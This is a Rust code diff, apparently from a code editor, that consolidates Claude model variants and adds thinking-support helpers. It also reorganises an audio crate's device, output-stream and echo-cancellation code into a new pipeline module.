- Self::ClaudeHaiku4_5 | Self::ClaudeHaiku4_5Thinking => "claude-haiku-4-5-20251001",
+ Self::ClaudeOpus4 => "claude-opus-4-20250514",
+ Self::ClaudeOpus4_1 => "claude-opus-4-1-20250805",
+ Self::ClaudeOpus4_5 => "claude-opus-4-5-20251101",
+ Self::ClaudeOpus4_6 => "claude-opus-4-6",
+ Self::ClaudeSonnet4 => "claude-sonnet-4-20250514",
+ Self::ClaudeSonnet4_5 | Self::ClaudeSonnet4_5_1mContext => "claude-sonnet-4-5-20250929",
+ Self::ClaudeSonnet4_6 => "claude-sonnet-4-6",
+ Self::ClaudeHaiku4_5 => "claude-haiku-4-5-20251001",
Self::Claude3Haiku => "claude-3-haiku-20240307",
Self::Custom { name, .. } => name,
}
@@ -328,26 +217,13 @@ impl Model {
match self {
Self::ClaudeOpus4 => "Claude Opus 4",
Self::ClaudeOpus4_1 => "Claude Opus 4.1",
- Self::ClaudeOpus4Thinking => "Claude Opus 4 Thinking",
- Self::ClaudeOpus4_1Thinking => "Claude Opus 4.1 Thinking",
Self::ClaudeOpus4_5 => "Claude Opus 4.5",
- Self::ClaudeOpus4_5Thinking => "Claude Opus 4.5 Thinking",
Self::ClaudeOpus4_6 => "Claude Opus 4.6",
- Self::ClaudeOpus4_6Thinking => "Claude Opus 4.6 Thinking",
- Self::ClaudeOpus4_6_1mContext => "Claude Opus 4.6 (1M context)",
- Self::ClaudeOpus4_6_1mContextThinking => "Claude Opus 4.6 Thinking (1M context)",
Self::ClaudeSonnet4 => "Claude Sonnet 4",
- Self::ClaudeSonnet4Thinking => "Claude Sonnet 4 Thinking",
Self::ClaudeSonnet4_5 => "Claude Sonnet 4.5",
- Self::ClaudeSonnet4_5Thinking => "Claude Sonnet 4.5 Thinking",
Self::ClaudeSonnet4_5_1mContext => "Claude Sonnet 4.5 (1M context)",
- Self::ClaudeSonnet4_5_1mContextThinking => "Claude Sonnet 4.5 Thinking (1M context)",
Self::ClaudeSonnet4_6 => "Claude Sonnet 4.6",
- Self::ClaudeSonnet4_6Thinking => "Claude Sonnet 4.6 Thinking",
- Self::ClaudeSonnet4_6_1mContext => "Claude Sonnet 4.6 (1M context)",
- Self::ClaudeSonnet4_6_1mContextThinking => "Claude Sonnet 4.6 Thinking (1M context)",
Self::ClaudeHaiku4_5 => "Claude Haiku 4.5",
- Self::ClaudeHaiku4_5Thinking => "Claude Haiku 4.5 Thinking",
Self::Claude3Haiku => "Claude 3 Haiku",
Self::Custom {
name, display_name, ..
@@ -359,26 +235,13 @@ impl Model {
match self {
Self::ClaudeOpus4
| Self::ClaudeOpus4_1
- | Self::ClaudeOpus4Thinking
- | Self::ClaudeOpus4_1Thinking
| Self::ClaudeOpus4_5
- | Self::ClaudeOpus4_5Thinking
| Self::ClaudeOpus4_6
- | Self::ClaudeOpus4_6Thinking
- | Self::ClaudeOpus4_6_1mContext
- | Self::ClaudeOpus4_6_1mContextThinking
| Self::ClaudeSonnet4
- | Self::ClaudeSonnet4Thinking
| Self::ClaudeSonnet4_5
- | Self::ClaudeSonnet4_5Thinking
| Self::ClaudeSonnet4_5_1mContext
- | Self::ClaudeSonnet4_5_1mContextThinking
| Self::ClaudeSonnet4_6
- | Self::ClaudeSonnet4_6Thinking
- | Self::ClaudeSonnet4_6_1mContext
- | Self::ClaudeSonnet4_6_1mContextThinking
| Self::ClaudeHaiku4_5
- | Self::ClaudeHaiku4_5Thinking
| Self::Claude3Haiku => Some(AnthropicModelCacheConfiguration {
min_total_token: 2_048,
should_speculate: true,
@@ -395,55 +258,28 @@ impl Model {
match self {
Self::ClaudeOpus4
| Self::ClaudeOpus4_1
- | Self::ClaudeOpus4Thinking
- | Self::ClaudeOpus4_1Thinking
| Self::ClaudeOpus4_5
- | Self::ClaudeOpus4_5Thinking
- | Self::ClaudeOpus4_6
- | Self::ClaudeOpus4_6Thinking
| Self::ClaudeSonnet4
- | Self::ClaudeSonnet4Thinking
| Self::ClaudeSonnet4_5
- | Self::ClaudeSonnet4_5Thinking
- | Self::ClaudeSonnet4_6
- | Self::ClaudeSonnet4_6Thinking
| Self::ClaudeHaiku4_5
- | Self::ClaudeHaiku4_5Thinking
| Self::Claude3Haiku => 200_000,
- Self::ClaudeOpus4_6_1mContext
- | Self::ClaudeOpus4_6_1mContextThinking
- | Self::ClaudeSonnet4_5_1mContext
- | Self::ClaudeSonnet4_5_1mContextThinking
- | Self::ClaudeSonnet4_6_1mContext
- | Self::ClaudeSonnet4_6_1mContextThinking => 1_000_000,
+ Self::ClaudeOpus4_6 | Self::ClaudeSonnet4_5_1mContext | Self::ClaudeSonnet4_6 => {
+ 1_000_000
+ }
Self::Custom { max_tokens, .. } => *max_tokens,
}
}
pub fn max_output_tokens(&self) -> u64 {
match self {
- Self::ClaudeOpus4
- | Self::ClaudeOpus4Thinking
- | Self::ClaudeOpus4_1
- | Self::ClaudeOpus4_1Thinking => 32_000,
+ Self::ClaudeOpus4 | Self::ClaudeOpus4_1 => 32_000,
Self::ClaudeOpus4_5
- | Self::ClaudeOpus4_5Thinking
| Self::ClaudeSonnet4
- | Self::ClaudeSonnet4Thinking
| Self::ClaudeSonnet4_5
- | Self::ClaudeSonnet4_5Thinking
| Self::ClaudeSonnet4_5_1mContext
- | Self::ClaudeSonnet4_5_1mContextThinking
| Self::ClaudeSonnet4_6
- | Self::ClaudeSonnet4_6Thinking
- | Self::ClaudeSonnet4_6_1mContext
- | Self::ClaudeSonnet4_6_1mContextThinking
- | Self::ClaudeHaiku4_5
- | Self::ClaudeHaiku4_5Thinking => 64_000,
- Self::ClaudeOpus4_6
- | Self::ClaudeOpus4_6Thinking
- | Self::ClaudeOpus4_6_1mContext
- | Self::ClaudeOpus4_6_1mContextThinking => 128_000,
+ | Self::ClaudeHaiku4_5 => 64_000,
+ Self::ClaudeOpus4_6 => 128_000,
Self::Claude3Haiku => 4_096,
Self::Custom {
max_output_tokens, ..
@@ -455,26 +291,13 @@ impl Model {
match self {
Self::ClaudeOpus4
| Self::ClaudeOpus4_1
- | Self::ClaudeOpus4Thinking
- | Self::ClaudeOpus4_1Thinking
| Self::ClaudeOpus4_5
- | Self::ClaudeOpus4_5Thinking
| Self::ClaudeOpus4_6
- | Self::ClaudeOpus4_6Thinking
- | Self::ClaudeOpus4_6_1mContext
- | Self::ClaudeOpus4_6_1mContextThinking
| Self::ClaudeSonnet4
- | Self::ClaudeSonnet4Thinking
| Self::ClaudeSonnet4_5
- | Self::ClaudeSonnet4_5Thinking
| Self::ClaudeSonnet4_5_1mContext
- | Self::ClaudeSonnet4_5_1mContextThinking
| Self::ClaudeSonnet4_6
- | Self::ClaudeSonnet4_6Thinking
- | Self::ClaudeSonnet4_6_1mContext
- | Self::ClaudeSonnet4_6_1mContextThinking
| Self::ClaudeHaiku4_5
- | Self::ClaudeHaiku4_5Thinking
| Self::Claude3Haiku => 1.0,
Self::Custom {
default_temperature,
@@ -484,46 +307,41 @@ impl Model {
}
pub fn mode(&self) -> AnthropicModelMode {
- match self {
- Self::ClaudeOpus4
- | Self::ClaudeOpus4_1
- | Self::ClaudeOpus4_5
- | Self::ClaudeOpus4_6
- | Self::ClaudeOpus4_6_1mContext
- | Self::ClaudeSonnet4
- | Self::ClaudeSonnet4_5
- | Self::ClaudeSonnet4_5_1mContext
- | Self::ClaudeSonnet4_6
- | Self::ClaudeSonnet4_6_1mContext
- | Self::ClaudeHaiku4_5
- | Self::Claude3Haiku => AnthropicModelMode::Default,
- Self::ClaudeOpus4Thinking
- | Self::ClaudeOpus4_1Thinking
- | Self::ClaudeOpus4_5Thinking
- | Self::ClaudeOpus4_6Thinking
- | Self::ClaudeOpus4_6_1mContextThinking
- | Self::ClaudeSonnet4Thinking
- | Self::ClaudeSonnet4_5Thinking
- | Self::ClaudeSonnet4_5_1mContextThinking
- | Self::ClaudeSonnet4_6Thinking
- | Self::ClaudeSonnet4_6_1mContextThinking
- | Self::ClaudeHaiku4_5Thinking => AnthropicModelMode::Thinking {
+ if self.supports_adaptive_thinking() {
+ AnthropicModelMode::AdaptiveThinking
+ } else if self.supports_thinking() {
+ AnthropicModelMode::Thinking {
budget_tokens: Some(4_096),
- },
- Self::Custom { mode, .. } => mode.clone(),
+ }
+ } else {
+ AnthropicModelMode::Default
}
}
+ pub fn supports_thinking(&self) -> bool {
+ matches!(
+ self,
+ Self::ClaudeOpus4
+ | Self::ClaudeOpus4_1
+ | Self::ClaudeOpus4_5
+ | Self::ClaudeOpus4_6
+ | Self::ClaudeSonnet4
+ | Self::ClaudeSonnet4_5
+ | Self::ClaudeSonnet4_5_1mContext
+ | Self::ClaudeSonnet4_6
+ | Self::ClaudeHaiku4_5
+ )
+ }
+
+ pub fn supports_adaptive_thinking(&self) -> bool {
+ matches!(self, Self::ClaudeOpus4_6 | Self::ClaudeSonnet4_6)
+ }
+
pub fn beta_headers(&self) -> Option<String> {
let mut headers = vec![];
match self {
- Self::ClaudeOpus4_6_1mContext
- | Self::ClaudeOpus4_6_1mContextThinking
- | Self::ClaudeSonnet4_5_1mContext
- | Self::ClaudeSonnet4_5_1mContextThinking
- | Self::ClaudeSonnet4_6_1mContext
- | Self::ClaudeSonnet4_6_1mContextThinking => {
+ Self::ClaudeSonnet4_5_1mContext => {
headers.push(CONTEXT_1M_BETA_HEADER.to_string());
}
Self::Custom {
@@ -1219,7 +1219,7 @@ impl TextThread {
} => cx.emit(TextThreadEvent::Operation(
TextThreadOperation::BufferOperation(operation.clone()),
)),
- language::BufferEvent::Edited => {
+ language::BufferEvent::Edited { .. } => {
self.count_remaining_tokens(cx);
self.reparse(cx);
cx.emit(TextThreadEvent::MessagesEdited);
@@ -901,14 +901,16 @@ impl TextThreadStore {
cx,
);
}
- ContextServerStatus::Stopped | ContextServerStatus::Error(_) => {
+ ContextServerStatus::Stopped
+ | ContextServerStatus::Error(_)
+ | ContextServerStatus::AuthRequired => {
if let Some(slash_command_ids) =
self.context_server_slash_command_ids.remove(server_id)
{
self.slash_commands.remove(&slash_command_ids);
}
}
- _ => {}
+ ContextServerStatus::Starting | ContextServerStatus::Authenticating => {}
}
}
@@ -14,7 +14,6 @@ doctest = false
[dependencies]
anyhow.workspace = true
-async-tar.workspace = true
collections.workspace = true
cpal.workspace = true
crossbeam.workspace = true
@@ -25,7 +24,6 @@ parking_lot.workspace = true
rodio.workspace = true
serde.workspace = true
settings.workspace = true
-smol.workspace = true
thiserror.workspace = true
util.workspace = true
@@ -1,77 +1,23 @@
-use anyhow::{Context as _, Result};
-use collections::HashMap;
-use cpal::{
- DeviceDescription, DeviceId, default_host,
- traits::{DeviceTrait, HostTrait},
-};
-use gpui::{App, AsyncApp, BackgroundExecutor, BorrowAppContext, Global};
+use std::time::Duration;
-#[cfg(not(any(all(target_os = "windows", target_env = "gnu"), target_os = "freebsd")))]
-mod non_windows_and_freebsd_deps {
- pub(super) use cpal::Sample;
- pub(super) use libwebrtc::native::apm;
- pub(super) use parking_lot::Mutex;
- pub(super) use rodio::source::LimitSettings;
- pub(super) use std::sync::Arc;
-}
-
-#[cfg(not(any(all(target_os = "windows", target_env = "gnu"), target_os = "freebsd")))]
-use non_windows_and_freebsd_deps::*;
+use rodio::{ChannelCount, SampleRate, nz};
-use rodio::{
- Decoder, DeviceSinkBuilder, MixerDeviceSink, Source,
- mixer::Mixer,
- nz,
- source::{AutomaticGainControlSettings, Buffered},
-};
-use settings::Settings;
-use std::{io::Cursor, num::NonZero, path::PathBuf, sync::atomic::Ordering, time::Duration};
-use util::ResultExt;
+pub const REPLAY_DURATION: Duration = Duration::from_secs(30);
+pub const SAMPLE_RATE: SampleRate = nz!(48000);
+pub const CHANNEL_COUNT: ChannelCount = nz!(2);
mod audio_settings;
-mod replays;
-mod rodio_ext;
pub use audio_settings::AudioSettings;
-pub use rodio_ext::RodioExt;
+pub use audio_settings::LIVE_SETTINGS;
-use crate::audio_settings::LIVE_SETTINGS;
-
-// We are migrating to 16kHz sample rate from 48kHz. In the future
-// once we are reasonably sure most users have upgraded we will
-// remove the LEGACY parameters.
-//
-// We migrate to 16kHz because it is sufficient for speech and required
-// by the denoiser and future Speech to Text layers.
-pub const SAMPLE_RATE: NonZero<u32> = nz!(16000);
-pub const CHANNEL_COUNT: NonZero<u16> = nz!(1);
-pub const BUFFER_SIZE: usize = // echo canceller and livekit want 10ms of audio
- (SAMPLE_RATE.get() as usize / 100) * CHANNEL_COUNT.get() as usize;
-
-pub const LEGACY_SAMPLE_RATE: NonZero<u32> = nz!(48000);
-pub const LEGACY_CHANNEL_COUNT: NonZero<u16> = nz!(2);
-
-pub const REPLAY_DURATION: Duration = Duration::from_secs(30);
-
-pub fn init(cx: &mut App) {
- LIVE_SETTINGS.initialize(cx);
-}
-
-// TODO(jk): this is currently cached only once - we should observe and react instead
-pub fn ensure_devices_initialized(cx: &mut App) {
- if cx.has_global::<AvailableAudioDevices>() {
- return;
- }
- cx.default_global::<AvailableAudioDevices>();
- let task = cx
- .background_executor()
- .spawn(async move { get_available_audio_devices() });
- cx.spawn(async move |cx: &mut AsyncApp| {
- let devices = task.await;
- cx.update(|cx| cx.set_global(AvailableAudioDevices(devices)));
- cx.refresh();
- })
- .detach();
-}
+mod audio_pipeline;
+pub use audio_pipeline::Audio;
+pub use audio_pipeline::{AudioDeviceInfo, AvailableAudioDevices};
+pub use audio_pipeline::{ensure_devices_initialized, resolve_device};
+// TODO(audio) replace with input test functionality in the audio crate
+pub use audio_pipeline::RodioExt;
+pub use audio_pipeline::init;
+pub use audio_pipeline::{open_input_stream, open_test_output};
#[derive(Debug, Copy, Clone, Eq, Hash, PartialEq)]
pub enum Sound {
@@ -99,359 +45,3 @@ impl Sound {
}
}
}
-
-pub struct Audio {
- output_handle: Option<MixerDeviceSink>,
- #[cfg(not(any(all(target_os = "windows", target_env = "gnu"), target_os = "freebsd")))]
- pub echo_canceller: Arc<Mutex<apm::AudioProcessingModule>>,
- source_cache: HashMap<Sound, Buffered<Decoder<Cursor<Vec<u8>>>>>,
- replays: replays::Replays,
-}
-
-impl Default for Audio {
- fn default() -> Self {
- Self {
- output_handle: Default::default(),
- #[cfg(not(any(
- all(target_os = "windows", target_env = "gnu"),
- target_os = "freebsd"
- )))]
- echo_canceller: Arc::new(Mutex::new(apm::AudioProcessingModule::new(
- true, false, false, false,
- ))),
- source_cache: Default::default(),
- replays: Default::default(),
- }
- }
-}
-
-impl Global for Audio {}
-
-impl Audio {
- fn ensure_output_exists(&mut self, output_audio_device: Option<DeviceId>) -> Result<&Mixer> {
- #[cfg(debug_assertions)]
- log::warn!(
- "Audio does not sound correct without optimizations. Use a release build to debug audio issues"
- );
-
- if self.output_handle.is_none() {
- let output_handle = open_output_stream(output_audio_device)?;
-
- // The webrtc apm is not yet compiling for windows & freebsd
- #[cfg(not(any(
- any(all(target_os = "windows", target_env = "gnu")),
- target_os = "freebsd"
- )))]
- let echo_canceller = Arc::clone(&self.echo_canceller);
-
- #[cfg(not(any(
- any(all(target_os = "windows", target_env = "gnu")),
- target_os = "freebsd"
- )))]
- {
- let source = rodio::source::Zero::new(CHANNEL_COUNT, SAMPLE_RATE)
- .inspect_buffer::<BUFFER_SIZE, _>(move |buffer| {
- let mut buf: [i16; _] = buffer.map(|s| s.to_sample());
- echo_canceller
- .lock()
- .process_reverse_stream(
- &mut buf,
- SAMPLE_RATE.get() as i32,
- CHANNEL_COUNT.get().into(),
- )
- .expect("Audio input and output threads should not panic");
- });
- output_handle.mixer().add(source);
- }
-
- #[cfg(any(
- any(all(target_os = "windows", target_env = "gnu")),
- target_os = "freebsd"
- ))]
- {
- let source = rodio::source::Zero::new(CHANNEL_COUNT, SAMPLE_RATE);
- output_handle.mixer().add(source);
- }
-
- self.output_handle = Some(output_handle);
- }
-
- Ok(self
- .output_handle
- .as_ref()
- .map(|h| h.mixer())
- .expect("we only get here if opening the outputstream succeeded"))
- }
-
- pub fn save_replays(
- &self,
- executor: BackgroundExecutor,
- ) -> gpui::Task<anyhow::Result<(PathBuf, Duration)>> {
- self.replays.replays_to_tar(executor)
- }
-
- #[cfg(not(any(all(target_os = "windows", target_env = "gnu"), target_os = "freebsd")))]
- pub fn open_microphone(voip_parts: VoipParts) -> anyhow::Result<impl Source> {
- let stream = open_input_stream(voip_parts.input_audio_device)?;
- let stream = stream
- .possibly_disconnected_channels_to_mono()
- .constant_samplerate(SAMPLE_RATE)
- .limit(LimitSettings::live_performance())
- .process_buffer::<BUFFER_SIZE, _>(move |buffer| {
- let mut int_buffer: [i16; _] = buffer.map(|s| s.to_sample());
- if voip_parts
- .echo_canceller
- .lock()
- .process_stream(
- &mut int_buffer,
- SAMPLE_RATE.get() as i32,
- CHANNEL_COUNT.get() as i32,
- )
- .context("livekit audio processor error")
- .log_err()
- .is_some()
- {
- for (sample, processed) in buffer.iter_mut().zip(&int_buffer) {
- *sample = (*processed).to_sample();
- }
- }
- })
- .denoise()
- .context("Could not set up denoiser")?
- .automatic_gain_control(AutomaticGainControlSettings {
- target_level: 0.90,
- attack_time: Duration::from_secs(1),
- release_time: Duration::from_secs(0),
- absolute_max_gain: 5.0,
- })
- .periodic_access(Duration::from_millis(100), move |agc_source| {
- agc_source
- .set_enabled(LIVE_SETTINGS.auto_microphone_volume.load(Ordering::Relaxed));
- let denoise = agc_source.inner_mut();
- denoise.set_enabled(LIVE_SETTINGS.denoise.load(Ordering::Relaxed));
- });
-
- let stream = if voip_parts.legacy_audio_compatible {
- stream.constant_params(LEGACY_CHANNEL_COUNT, LEGACY_SAMPLE_RATE)
- } else {
- stream.constant_params(CHANNEL_COUNT, SAMPLE_RATE)
- };
-
- let (replay, stream) = stream.replayable(REPLAY_DURATION)?;
- voip_parts
- .replays
- .add_voip_stream("local microphone".to_string(), replay);
-
- Ok(stream)
- }
-
- pub fn play_voip_stream(
- source: impl rodio::Source + Send + 'static,
- speaker_name: String,
- is_staff: bool,
- cx: &mut App,
- ) -> anyhow::Result<()> {
- let (replay_source, source) = source
- .constant_params(CHANNEL_COUNT, SAMPLE_RATE)
- .automatic_gain_control(AutomaticGainControlSettings {
- target_level: 0.90,
- attack_time: Duration::from_secs(1),
- release_time: Duration::from_secs(0),
- absolute_max_gain: 5.0,
- })
- .periodic_access(Duration::from_millis(100), move |agc_source| {
- agc_source.set_enabled(LIVE_SETTINGS.auto_speaker_volume.load(Ordering::Relaxed));
- })
- .replayable(REPLAY_DURATION)
- .expect("REPLAY_DURATION is longer than 100ms");
- let output_audio_device = AudioSettings::get_global(cx).output_audio_device.clone();
-
- cx.update_default_global(|this: &mut Self, _cx| {
- let output_mixer = this
- .ensure_output_exists(output_audio_device)
- .context("Could not get output mixer")?;
- output_mixer.add(source);
- if is_staff {
- this.replays.add_voip_stream(speaker_name, replay_source);
- }
- Ok(())
- })
- }
-
- pub fn play_sound(sound: Sound, cx: &mut App) {
- let output_audio_device = AudioSettings::get_global(cx).output_audio_device.clone();
- cx.update_default_global(|this: &mut Self, cx| {
- let source = this.sound_source(sound, cx).log_err()?;
- let output_mixer = this
- .ensure_output_exists(output_audio_device)
- .context("Could not get output mixer")
- .log_err()?;
-
- output_mixer.add(source);
- Some(())
- });
- }
-
- pub fn end_call(cx: &mut App) {
- cx.update_default_global(|this: &mut Self, _cx| {
- this.output_handle.take();
- });
- }
-
- fn sound_source(&mut self, sound: Sound, cx: &App) -> Result<impl Source + use<>> {
- if let Some(wav) = self.source_cache.get(&sound) {
- return Ok(wav.clone());
- }
-
- let path = format!("sounds/{}.wav", sound.file());
- let bytes = cx
- .asset_source()
- .load(&path)?
- .map(anyhow::Ok)
- .with_context(|| format!("No asset available for path {path}"))??
- .into_owned();
- let cursor = Cursor::new(bytes);
- let source = Decoder::new(cursor)?.buffered();
-
- self.source_cache.insert(sound, source.clone());
-
- Ok(source)
- }
-}
-
-#[cfg(not(any(all(target_os = "windows", target_env = "gnu"), target_os = "freebsd")))]
-pub struct VoipParts {
- echo_canceller: Arc<Mutex<apm::AudioProcessingModule>>,
- replays: replays::Replays,
- legacy_audio_compatible: bool,
- input_audio_device: Option<DeviceId>,
-}
-
-#[cfg(not(any(all(target_os = "windows", target_env = "gnu"), target_os = "freebsd")))]
-impl VoipParts {
- pub fn new(cx: &AsyncApp) -> anyhow::Result<Self> {
- let (apm, replays) = cx.read_default_global::<Audio, _>(|audio, _| {
- (Arc::clone(&audio.echo_canceller), audio.replays.clone())
- });
- let legacy_audio_compatible =
- AudioSettings::try_read_global(cx, |settings| settings.legacy_audio_compatible)
- .unwrap_or(true);
- let input_audio_device =
- AudioSettings::try_read_global(cx, |settings| settings.input_audio_device.clone())
- .flatten();
-
- Ok(Self {
- legacy_audio_compatible,
- echo_canceller: apm,
- replays,
- input_audio_device,
- })
- }
-}
-
-pub fn open_input_stream(
- device_id: Option<DeviceId>,
-) -> anyhow::Result<rodio::microphone::Microphone> {
- let builder = rodio::microphone::MicrophoneBuilder::new();
- let builder = if let Some(id) = device_id {
- // TODO(jk): upstream patch
- // if let Some(input_device) = default_host().device_by_id(id) {
- // builder.device(input_device);
- // }
- let mut found = None;
- for input in rodio::microphone::available_inputs()? {
- if input.clone().into_inner().id()? == id {
- found = Some(builder.device(input));
- break;
- }
- }
- found.unwrap_or_else(|| builder.default_device())?
- } else {
- builder.default_device()?
- };
- let stream = builder
- .default_config()?
- .prefer_sample_rates([
- SAMPLE_RATE,
- SAMPLE_RATE.saturating_mul(rodio::nz!(2)),
- SAMPLE_RATE.saturating_mul(rodio::nz!(3)),
- SAMPLE_RATE.saturating_mul(rodio::nz!(4)),
- ])
- .prefer_channel_counts([rodio::nz!(1), rodio::nz!(2), rodio::nz!(3), rodio::nz!(4)])
- .prefer_buffer_sizes(512..)
- .open_stream()?;
- log::info!("Opened microphone: {:?}", stream.config());
- Ok(stream)
-}
-
-pub fn resolve_device(device_id: Option<&DeviceId>, input: bool) -> anyhow::Result<cpal::Device> {
- if let Some(id) = device_id {
- if let Some(device) = default_host().device_by_id(id) {
- return Ok(device);
- }
- log::warn!("Selected audio device not found, falling back to default");
- }
- if input {
- default_host()
- .default_input_device()
- .context("no audio input device available")
- } else {
- default_host()
- .default_output_device()
- .context("no audio output device available")
- }
-}
-
-pub fn open_output_stream(device_id: Option<DeviceId>) -> anyhow::Result<MixerDeviceSink> {
- let device = resolve_device(device_id.as_ref(), false)?;
- let mut output_handle = DeviceSinkBuilder::from_device(device)?
- .open_stream()
- .context("Could not open output stream")?;
- output_handle.log_on_drop(false);
- log::info!("Output stream: {:?}", output_handle);
- Ok(output_handle)
-}
-
-#[derive(Clone, Debug)]
-pub struct AudioDeviceInfo {
- pub id: DeviceId,
- pub desc: DeviceDescription,
-}
-
-impl AudioDeviceInfo {
- pub fn matches_input(&self, is_input: bool) -> bool {
- if is_input {
- self.desc.supports_input()
- } else {
- self.desc.supports_output()
- }
- }
-
- pub fn matches(&self, id: &DeviceId, is_input: bool) -> bool {
- &self.id == id && self.matches_input(is_input)
- }
-}
-
-impl std::fmt::Display for AudioDeviceInfo {
- fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
- write!(f, "{} ({})", self.desc.name(), self.id)
- }
-}
-
-fn get_available_audio_devices() -> Vec<AudioDeviceInfo> {
- let Some(devices) = default_host().devices().ok() else {
- return Vec::new();
- };
- devices
- .filter_map(|device| {
- let id = device.id().ok()?;
- let desc = device.description().ok()?;
- Some(AudioDeviceInfo { id, desc })
- })
- .collect()
-}
-
-#[derive(Default, Clone, Debug)]
-pub struct AvailableAudioDevices(pub Vec<AudioDeviceInfo>);
-
-impl Global for AvailableAudioDevices {}
@@ -0,0 +1,247 @@
+use anyhow::{Context as _, Result};
+use collections::HashMap;
+use cpal::{
+ DeviceDescription, DeviceId, default_host,
+ traits::{DeviceTrait, HostTrait},
+};
+use gpui::{App, AsyncApp, BorrowAppContext, Global};
+
+pub(super) use cpal::Sample;
+
+use rodio::{Decoder, DeviceSinkBuilder, MixerDeviceSink, Source, mixer::Mixer, source::Buffered};
+use settings::Settings;
+use std::io::Cursor;
+use util::ResultExt;
+
+mod echo_canceller;
+use echo_canceller::EchoCanceller;
+mod rodio_ext;
+pub use crate::audio_settings::AudioSettings;
+pub use rodio_ext::RodioExt;
+
+use crate::audio_settings::LIVE_SETTINGS;
+
+use crate::Sound;
+
+use super::{CHANNEL_COUNT, SAMPLE_RATE};
+pub const BUFFER_SIZE: usize = // echo canceller and livekit want 10ms of audio
+ (SAMPLE_RATE.get() as usize / 100) * CHANNEL_COUNT.get() as usize;
+
+pub fn init(cx: &mut App) {
+ LIVE_SETTINGS.initialize(cx);
+}
+
+// TODO(jk): this is currently cached only once - we should observe and react instead
+pub fn ensure_devices_initialized(cx: &mut App) {
+ if cx.has_global::<AvailableAudioDevices>() {
+ return;
+ }
+ cx.default_global::<AvailableAudioDevices>();
+ let task = cx
+ .background_executor()
+ .spawn(async move { get_available_audio_devices() });
+ cx.spawn(async move |cx: &mut AsyncApp| {
+ let devices = task.await;
+ cx.update(|cx| cx.set_global(AvailableAudioDevices(devices)));
+ cx.refresh();
+ })
+ .detach();
+}
+
+#[derive(Default)]
+pub struct Audio {
+ output: Option<(MixerDeviceSink, Mixer)>,
+ pub echo_canceller: EchoCanceller,
+ source_cache: HashMap<Sound, Buffered<Decoder<Cursor<Vec<u8>>>>>,
+}
+
+impl Global for Audio {}
+
+impl Audio {
+ fn ensure_output_exists(&mut self, output_audio_device: Option<DeviceId>) -> Result<&Mixer> {
+ #[cfg(debug_assertions)]
+ log::warn!(
+ "Audio does not sound correct without optimizations. Use a release build to debug audio issues"
+ );
+
+ if self.output.is_none() {
+ let (output_handle, output_mixer) =
+ open_output_stream(output_audio_device, self.echo_canceller.clone())?;
+ self.output = Some((output_handle, output_mixer));
+ }
+
+ Ok(self
+ .output
+ .as_ref()
+ .map(|(_, mixer)| mixer)
+ .expect("we only get here if opening the outputstream succeeded"))
+ }
+
+ pub fn play_sound(sound: Sound, cx: &mut App) {
+ let output_audio_device = AudioSettings::get_global(cx).output_audio_device.clone();
+ cx.update_default_global(|this: &mut Self, cx| {
+ let source = this.sound_source(sound, cx).log_err()?;
+ let output_mixer = this
+ .ensure_output_exists(output_audio_device)
+ .context("Could not get output mixer")
+ .log_err()?;
+
+ output_mixer.add(source);
+ Some(())
+ });
+ }
+
+ pub fn end_call(cx: &mut App) {
+ cx.update_default_global(|this: &mut Self, _cx| {
+ this.output.take();
+ });
+ }
+
+ fn sound_source(&mut self, sound: Sound, cx: &App) -> Result<impl Source + use<>> {
+ if let Some(wav) = self.source_cache.get(&sound) {
+ return Ok(wav.clone());
+ }
+
+ let path = format!("sounds/{}.wav", sound.file());
+ let bytes = cx
+ .asset_source()
+ .load(&path)?
+ .map(anyhow::Ok)
+ .with_context(|| format!("No asset available for path {path}"))??
+ .into_owned();
+ let cursor = Cursor::new(bytes);
+ let source = Decoder::new(cursor)?.buffered();
+
+ self.source_cache.insert(sound, source.clone());
+
+ Ok(source)
+ }
+}
+
+pub fn open_input_stream(
+ device_id: Option<DeviceId>,
+) -> anyhow::Result<rodio::microphone::Microphone> {
+ let builder = rodio::microphone::MicrophoneBuilder::new();
+ let builder = if let Some(id) = device_id {
+ // TODO(jk): upstream patch
+ // if let Some(input_device) = default_host().device_by_id(id) {
+ // builder.device(input_device);
+ // }
+ let mut found = None;
+ for input in rodio::microphone::available_inputs()? {
+ if input.clone().into_inner().id()? == id {
+ found = Some(builder.device(input));
+ break;
+ }
+ }
+ found.unwrap_or_else(|| builder.default_device())?
+ } else {
+ builder.default_device()?
+ };
+ let stream = builder
+ .default_config()?
+ .prefer_sample_rates([
+ SAMPLE_RATE,
+ SAMPLE_RATE.saturating_mul(rodio::nz!(2)),
+ SAMPLE_RATE.saturating_mul(rodio::nz!(3)),
+ SAMPLE_RATE.saturating_mul(rodio::nz!(4)),
+ ])
+ .prefer_channel_counts([rodio::nz!(1), rodio::nz!(2), rodio::nz!(3), rodio::nz!(4)])
+ .prefer_buffer_sizes(512..)
+ .open_stream()?;
+ log::info!("Opened microphone: {:?}", stream.config());
+ Ok(stream)
+}
+
+pub fn resolve_device(device_id: Option<&DeviceId>, input: bool) -> anyhow::Result<cpal::Device> {
+ if let Some(id) = device_id {
+ if let Some(device) = default_host().device_by_id(id) {
+ return Ok(device);
+ }
+ log::warn!("Selected audio device not found, falling back to default");
+ }
+ if input {
+ default_host()
+ .default_input_device()
+ .context("no audio input device available")
+ } else {
+ default_host()
+ .default_output_device()
+ .context("no audio output device available")
+ }
+}
+
+pub fn open_test_output(device_id: Option<DeviceId>) -> anyhow::Result<MixerDeviceSink> {
+ let device = resolve_device(device_id.as_ref(), false)?;
+ DeviceSinkBuilder::from_device(device)?
+ .open_stream()
+ .context("Could not open output stream")
+}
+
+pub fn open_output_stream(
+ device_id: Option<DeviceId>,
+ mut echo_canceller: EchoCanceller,
+) -> anyhow::Result<(MixerDeviceSink, Mixer)> {
+ let device = resolve_device(device_id.as_ref(), false)?;
+ let mut output_handle = DeviceSinkBuilder::from_device(device)?
+ .open_stream()
+ .context("Could not open output stream")?;
+ output_handle.log_on_drop(false);
+ log::info!("Output stream: {:?}", output_handle);
+
+ let (output_mixer, source) = rodio::mixer::mixer(CHANNEL_COUNT, SAMPLE_RATE);
+ // otherwise the mixer ends as it's empty
+ output_mixer.add(rodio::source::Zero::new(CHANNEL_COUNT, SAMPLE_RATE));
+ let echo_cancelling_source = source // apply echo cancellation just before output
+ .inspect_buffer::<BUFFER_SIZE, _>(move |buffer| {
+ let mut buf: [i16; _] = buffer.map(|s| s.to_sample());
+ echo_canceller.process_reverse_stream(&mut buf)
+ });
+ output_handle.mixer().add(echo_cancelling_source);
+
+ Ok((output_handle, output_mixer))
+}
+
